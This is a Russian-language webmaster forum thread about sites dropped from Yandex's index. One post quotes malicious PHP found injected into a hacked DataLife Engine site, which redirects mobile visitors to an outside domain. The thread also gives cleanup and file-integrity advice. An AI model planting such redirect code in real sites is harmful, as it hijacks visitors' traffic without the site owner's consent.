Проблемы с сайтом
Страницы: 1
Проблемы с сайтом, Яндекс выкинул, все....
Доброго времени суток уважаемые форумчане! С сайтом появились проблемы, не пойму по какой причине Яндекс его не взлюбил, тоесть Яша выкинул, все страницы оставив только главную (попал по фильтр). А до этого момента, он сайт нормально индексировал - в индексе около 200 страничек было). Может кто, чего пояснит, что я сделал не так и почему такое произошло.Вот собственно ссылка на сам сайт softtportal.net

За ранее спасибо.....
Возможно это глюк .. подождите парочку апов, вы не одни с таким столкнулись)
SergeS, Думаю стоит проверить сайт на вредоносный код
У меня похожая ситуация:( Пару дней назад выпали почти все страницы, как оказалось взломали сайт. Почистил сайт, сейчас жду, когда яндекс все вернет на свои места
Цитата
ashel пишет:
SergeS, Думаю стоит проверить сайт на вредоносный код
У меня похожая ситуация:( Пару дней назад выпали почти все страницы, как оказалось взломали сайт. Почистил сайт, сейчас жду, когда яндекс все вернет на свои места
Не факт что код тому вина) у меня 3 сайта на вылете, не взломанных)
Цитата
ashel пишет:
А как это сделать - проверить на вредоносный код?
Цитата
Игорь Богаудинов пишет:
Цитата
ashel пишет:
Не факт что код тому вина) у меня 3 сайта на вылете, не взломанных)
Конечно не факт, тут может быть много причин) 

Цитата
SergeS пишет:
А как это сделать - проверить на вредоносный код?
У меня сайт стоит на dle и открыв файл  index.php обнаружил след. код:

Код
 $iphone = strpos($_SERVER['HTTP_USER_AGENT'],"iPhone");
$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");
$palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS");
$berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");
$ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod");

if ($iphone || $android || $palmpre || $ipod || $berry === true) { 
    header('Location: http://statuses.ws/');
}

Начал ковырять дальше и обнаружил это код еще в  /engine/data/config.php, /engine/init.php. Почистил сайт и теперь жду, когда Яша вернет страницы
Цитата
Начал ковырять дальше и обнаружил это код еще в  /engine/data/config.php, /engine/init.php. Почистил сайт и теперь жду, когда Яша вернет страницы
Просмотрел я эти папки, вроде нет там не чего подобного. Хотя много чего я там, так и не понял, может и есть, все же что левое.  Например 
Цитата
Цитата
[COLOR=#000000]<?php[/COLOR]
Цитата
[COLOR=#000000]/*[/COLOR]
Цитата
[COLOR=#000000]=====================================================[/COLOR]
Цитата
[COLOR=#000000] DataLife Engine - by SoftNews Media Group [/COLOR]
Цитата
[COLOR=#000000]-----------------------------------------------------[/COLOR]
Цитата
[COLOR=#000000] dle-news.ru/[/COLOR]
Цитата
Цитата
[COLOR=#000000] Copyright © 2004,2012 SoftNews Media Group[/COLOR]
Цитата
Цитата
[COLOR=#000000] Данный код защищен авторскими правами[/COLOR]
Цитата
Цитата
[COLOR=#000000] Файл: index.php[/COLOR]
Цитата
Цитата
[COLOR=#000000] Назначение: Главная страница[/COLOR]

Так он должен начинаться или до - Файл: index.php   - это лишнее, так как раньше - странички о Дле сайте, тоже в индексе присутствовали. И вот например одна такая и сейчас в индексе есть:
Цитата

Информация » DataLife Engine ( softtportal.net/main/ )
Демонстрационная страница движка DataLife Engine...

softtportal.net ( softtportal.net/ )›main/ ( softtportal.net/main/ ) копия ( hghltd.yandex.net/yandbtm?text=host%3Asofttportal.net%20%7C%20host%3Awww.softtportal.net&url=http%3A%2F%2Fsofttportal.net%2Fmain%2F&fmode=inject&mime=html&l10n=ru&sign=5354216cc1753db4fe1d1b87890f7ec0&keyno=0 )

Может, кто чего пояснит или поможет, мне навести порядок со всеми этими настройками и подстройками?)
У меня тоже такие проблемы были с сайтами. Причину не нашел (уник - 100%). А где-то через месяца полтора вернулись в индекс, одно даже тиц 10 дали. И я смотрю по времени нахождения вашего  сайта в поиске, тоже где-то так. И еще : по одному сайту написал в суппорт, так они его вообще забанили.
Изменено: владимир перов - 30 Января 2013 12:30
Цитата
У меня тоже такие проблемы были с сайтами. Причину не нашел (уник - 100%). А где-то через месяца полтора вернулись в индекс,
Так что думаете подождать надо? на счет Яши. А сайтом и дальше заниматься, в плане наполнения.
В админке ДЛЕ Есть опция по проверке файлов движка. Когда от вирусов все файлы почистите, воспользуйтесь этой опцией. Движок сам себя отсканирует на предмет нездоровой активности и сделает снимок всей системы. И потом, при следующих сканированиях будет сравнивать все изменения и ставить Вас в известность. А вы уже будете действовать сообразно обстоятельствам.
Нам Кухня строить и жить помогает...
Здравствуйте, подскажите пожалуйста почему яндекс выкинул полностью мой сайт из индекса? Он находился в индексе примерно 3 месяца и все было нормально, в поиске находились почти все страницы. На сайт не было не одной внешней ссылки и вчера обнаружил, что количество страниц в поиске ровно нулю, проверил сайт через прогу "баян" все нормально. Единственные изменения которые я делал, это изменил заголовки трех страниц и слегка доработал статьи на этих же трех страницах. 
stepan volynov,
Ссылку на сайт дайте в личку. Посмотрю.
P.S. Если кому то еще необходимы рекомендации по сайтам - в личку ссылки кидайте.
Изменено: Морген Фриц - 2 Февраля 2013 11:00
Страницы: 1